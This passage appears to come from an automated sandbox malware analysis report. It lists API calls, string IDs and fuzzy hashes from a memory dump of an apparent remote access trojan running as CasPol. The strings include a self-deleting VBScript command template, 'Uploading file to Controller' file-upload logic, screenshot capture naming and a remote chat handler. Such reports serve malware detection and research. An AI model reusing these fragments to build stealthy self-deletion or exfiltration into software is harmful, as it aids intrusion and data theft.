                                                                                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
                                                                                                                    • GetCursorPos.USER32(?), ref: 0041CB08
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0041CB11
                                                                                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
                                                                                                                    • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
                                                                                                                    • ExitProcess.KERNEL32 ref: 0041CB84
                                                                                                                    • CreatePopupMenu.USER32 ref: 0041CB8A
                                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                    • String ID: Close
                                                                                                                    • API String ID: 1657328048-3535843008
                                                                                                                    • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                    • Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
                                                                                                                    • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                    • Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2509303402-0
                                                                                                                    • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                    • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                    • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                    • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                    • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                    • API String ID: 1884690901-3066803209
                                                                                                                    • Opcode ID: 157b890a00aff1dc93243e7f043ac0f1883b9fb4f689d54900e142c2c42143bb
                                                                                                                    • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                    • Opcode Fuzzy Hash: 157b890a00aff1dc93243e7f043ac0f1883b9fb4f689d54900e142c2c42143bb
                                                                                                                    • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                      • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                      • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                      • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                      • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                      • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                    • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                    • API String ID: 3795512280-3163867910
                                                                                                                    • Opcode ID: df7c5d6bd4f122e76fe01cb97435b074263eadd892a188a49a85285b10a28c7a
                                                                                                                    • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                    • Opcode Fuzzy Hash: df7c5d6bd4f122e76fe01cb97435b074263eadd892a188a49a85285b10a28c7a
                                                                                                                    • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                    • _free.LIBCMT ref: 004500B6
                                                                                                                      • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                    • _free.LIBCMT ref: 004500D8
                                                                                                                    • _free.LIBCMT ref: 004500ED
                                                                                                                    • _free.LIBCMT ref: 004500F8
                                                                                                                    • _free.LIBCMT ref: 0045011A
                                                                                                                    • _free.LIBCMT ref: 0045012D
                                                                                                                    • _free.LIBCMT ref: 0045013B
                                                                                                                    • _free.LIBCMT ref: 00450146
                                                                                                                    • _free.LIBCMT ref: 0045017E
                                                                                                                    • _free.LIBCMT ref: 00450185
                                                                                                                    • _free.LIBCMT ref: 004501A2
                                                                                                                    • _free.LIBCMT ref: 004501BA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161543041-0
                                                                                                                    • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                    • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                    • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                    • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                    • _free.LIBCMT ref: 10007CFB
                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                    • _free.LIBCMT ref: 10007D1D
                                                                                                                    • _free.LIBCMT ref: 10007D32
                                                                                                                    • _free.LIBCMT ref: 10007D3D
                                                                                                                    • _free.LIBCMT ref: 10007D5F
                                                                                                                    • _free.LIBCMT ref: 10007D72
                                                                                                                    • _free.LIBCMT ref: 10007D80
                                                                                                                    • _free.LIBCMT ref: 10007D8B
                                                                                                                    • _free.LIBCMT ref: 10007DC3
                                                                                                                    • _free.LIBCMT ref: 10007DCA
                                                                                                                    • _free.LIBCMT ref: 10007DE7
                                                                                                                    • _free.LIBCMT ref: 10007DFF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161543041-0
                                                                                                                    • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                    • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                    • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                    • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                    • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                    • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                    • API String ID: 489098229-65789007
                                                                                                                    • Opcode ID: 5540d76b84af48c8b24930b41dec85dffce92f3f7f811bdfea4c6e9bb0e6040e
                                                                                                                    • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                                    • Opcode Fuzzy Hash: 5540d76b84af48c8b24930b41dec85dffce92f3f7f811bdfea4c6e9bb0e6040e
                                                                                                                    • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                      • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                      • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                      • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                    • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                    • API String ID: 1913171305-390638927
                                                                                                                    • Opcode ID: 891b1c77f3889e71ee1344af7ac6359a36d5df3dd2e3bd5fb2145de71cb9124a
                                                                                                                    • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                                    • Opcode Fuzzy Hash: 891b1c77f3889e71ee1344af7ac6359a36d5df3dd2e3bd5fb2145de71cb9124a
                                                                                                                    • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 269201875-0
                                                                                                                    • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                    • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                    • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                    • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                    • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                    • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                    • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                    • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                    • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                    • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                    • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                    • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                    • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                    • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 65535$udp
                                                                                                                    • API String ID: 0-1267037602
                                                                                                                    • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                    • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                    • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                    • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                    • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                    • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                    • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                    • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                    • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                    • _free.LIBCMT ref: 0043947A
                                                                                                                    • _free.LIBCMT ref: 00439481
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2441525078-0
                                                                                                                    • Opcode ID: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                    • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                                    • Opcode Fuzzy Hash: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                    • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                                    APIs
                                                                                                                    • SetEvent.KERNEL32(?), ref: 00404E71
                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                    • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                    • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00404FF3
                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                    • API String ID: 2956720200-749203953
                                                                                                                    • Opcode ID: 8aa59a6778f6d6edb5583921c8fa7ed681ce9098d2c9d0f219d5a0ae501ea138
                                                                                                                    • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                                    • Opcode Fuzzy Hash: 8aa59a6778f6d6edb5583921c8fa7ed681ce9098d2c9d0f219d5a0ae501ea138
                                                                                                                    • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                    • String ID: <$@$@FG$@FG$Temp
                                                                                                                    • API String ID: 1107811701-2245803885
                                                                                                                    • Opcode ID: be1bdbac5d7fd4b2506e1986772504a411da5bf12c6f302bd9e9f304a4c67618
                                                                                                                    • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                                    • Opcode Fuzzy Hash: be1bdbac5d7fd4b2506e1986772504a411da5bf12c6f302bd9e9f304a4c67618
